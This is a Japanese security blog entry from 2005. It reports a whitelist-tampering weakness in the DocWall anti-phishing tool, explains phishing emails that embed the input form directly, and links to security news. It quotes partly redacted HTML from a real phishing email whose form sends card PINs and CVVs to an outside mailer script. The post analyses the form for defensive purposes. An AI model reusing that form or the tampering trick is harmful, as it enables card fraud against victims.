星澤裕二メモ このページをアンテナに追加 RSSフィード

2005/10/25

[]デジタルアーツ、モバイル端末の個別フィルタリングを実現する特許技術 (nikkeibp.jp, 10/25) デジタルアーツ、モバイル端末の個別フィルタリングを実現する特許技術 (nikkeibp.jp, 10/25)を含むブックマーク デジタルアーツ、モバイル端末の個別フィルタリングを実現する特許技術 (nikkeibp.jp, 10/25)のブックマークコメント

モバイル端末からWebサイトにアクセスする際、同時にデジタルアーツが提供するフィルタリングサーバーにURL情報を送信する並列処理技術を採用した。同社のフィルタリング・サーバーがユーザー設定を確認し、URLの閲覧可否をモバイル端末に返送する仕組み。

この技術が採用された場合、端末とフィルタリング・サーバ間の通信費はだれが負担するのだろう?

[]CNCのフィッシング対策ソフト「DocWall」を試してみた(続き) CNCのフィッシング対策ソフト「DocWall」を試してみた(続き)を含むブックマーク CNCのフィッシング対策ソフト「DocWall」を試してみた(続き)のブックマークコメント

昨日の続き。ホワイトリストファイル(C:\Program Files\docwall\list\webhostwhite)の改ざんチェックをしていない。空のファイルと置き換えてみると、それまで認証済みサイトと表示していたサイトが未登録サイトになってしまう。

The Wind of Blessing: 「フィッシング詐欺防止システムDocWall」にも「DocWall」試用レポートがあった。

[]偽サイトにジャンプしないフィッシング 偽サイトにジャンプしないフィッシングを含むブックマーク 偽サイトにジャンプしないフィッシングのブックマークコメント

最近は少なくなった偽サイトにジャンプしないフィッシング。一般的なフィッシングでは、メール本文に偽サイトへのリンクがあり、クリックするとクレジットカード番号などの個人情報を入力させる偽サイトに接続する。

しかし、偽サイトにジャンプしないフィッシングの手口では、メールに偽サイトへのリンクは存在せず、入力フォームと送信ボタンやログインボタンがある。入力フォームにカード情報などを入力して[Log On]ボタンを押すと、入力した情報が偽サイトに送信される。

f:id:hoshizawa:20051025001310p:image

メールのHTMLソースはこんな感じになっている(一部伏せ字)。

<FORM name=mailbomber action="http://members.lycos.co.uk/xxxxxxxxxxxxxxx/mailer.php" method=post>
<TABLE cellSpacing=0 cellPadding=0 width="87%" border=0>
<TBODY>
<TR vAlign=top>
<TD vAlign=bottom width="100%" height=28>
<TABLE cellSpacing=0 cellPadding=0 width="1022" border=0>

(中略)

<SELECT name=cardtype> <OPTION value="" selected>--Card Type--</OPTION>
<OPTION value=Credit>Credit</OPTION> <OPTION value=Debit>Debit</OPTION></SELECT>
</FONT></P></TD></TR>
<TR borderColor=#111111>
<TD width=12 bgColor=#ffffff height=35>&nbsp;</TD>
<TD width=175 bgColor=#ffffff height=35><FONT face="Verdana, Arial, Helvetica,
 sans-serif" size=2>(Required) <B>Credit/Debit card PIN</B></FONT></TD>
<TD width=593 height=35><FONT face="Verdana, Arial, Helvetica, sans-serif"><B>
<INPUT type=password maxLength=6 size=4 name=pin> </B></FONT></TD></TR>
<TR borderColor=#111111>
<TD width=12 bgColor=#ffffff height=35>&nbsp;</TD>
<TD width=175 bgColor=#ffffff height=35><FONT face="Verdana, Arial, Helvetica,
 sans-serif" size=2>(Required) <B>CVV</B></FONT></TD>
<TD width=593 height=35><FONT face="Verdana, Arial, Helvetica, sans-serif"><B>
<INPUT maxLength=4 size=6 name=cvv> </B><FONT size=1>3 digits for Visa ,
 MasterCard , Discover | 4 digits for American Express </FONT></FONT></TD></TR>

[][][]ニュース ニュースを含むブックマーク ニュースのブックマークコメント

UFJ銀・ATM盗撮:名義や口座番号も、カード表面映る ネットで悪用の恐れ (MSN-Mainichi INTERACTIVE, 10/21)

受信機に残された画像には、キャッシュカードが映っており、個人名や口座番号を示す数字を読み取れることが分かった。小型カメラによるATMでの盗撮は、個人情報の入手が目的だった可能性もあり、警視庁捜査3課は、個人情報を悪用し、インターネットを使った取引などの不正利用を図る組織的な犯行の疑いもあるとみて、解明を進めている。

UFJ銀・ATM盗撮:名義や口座番号も、カード表面映る ネットで悪用の恐れ (MSN-Mainichi INTERACTIVE, 10/21)

警察庁:有害ネットを自動監視 一元システムを構築へ (MSN-Mainichi INTERACTIVE, 10/21)

A new botnet - Mocbot (NEW) (SANS - Internet Storm Center : Handler's Diary, 10/24)

Phishing On the Rise (The Washington Post, 10/22)

世界インターネット人口の77%がネット・ショッピングを経験 (nikkeibp.jp, 10/24)

ミラポイントが新手のウイルス対策製品を発表,送信パターンで検知 (IT Pro, 10/24)

不正アクセス方法対策インタビュー(後編) (日経BP社, 10/21)

10月に公開されたWindowsのセキュリティ・ホールを突くボットが出現 (IT Pro, 10/24)

インターネット上のサーバ、不正ホストは約1万5千台に1台 (ITmedia, 10/24)

不正ホスト数を明らかにするために用いた技術は、「ポートスキャンの独立一様分布の仮定に基づく数学的モデル」。2005年5月31日から8月31日までの間、計5台の観測装置で測定した不正パケット(不正侵入や攻撃を目的とするアクセス)の累計データをこのモデルに当てはめる形で算出された。

 この結果、1万5千台に1台は不正ホストであるという。また、脆弱性のあるホストをインターネットに接続した場合、20分後には全体の70%が、60分後には全体の95%が感染するという結果となった。そのほか、不正ホストは、1秒あたり平均78.27回の攻撃、コンピュータウイルスなどのスクリプトを実行していると推定している。

インターネット上のサーバ、不正ホストは約1万5千台に1台 (ITmedia, 10/24)

Zotobと同様のWindowsの脆弱性を悪用するエクスプロイトコードが登場 (CNET Japan, 10/24)

オランダの「ボット使い」、操っていたPCは150万台か (CNET Japan, 10/24)

トラックバック - http://d.hatena.ne.jp/hoshizawa/20051025
このブログの中のコメントは私見であり、所属する団体のコメントではありません。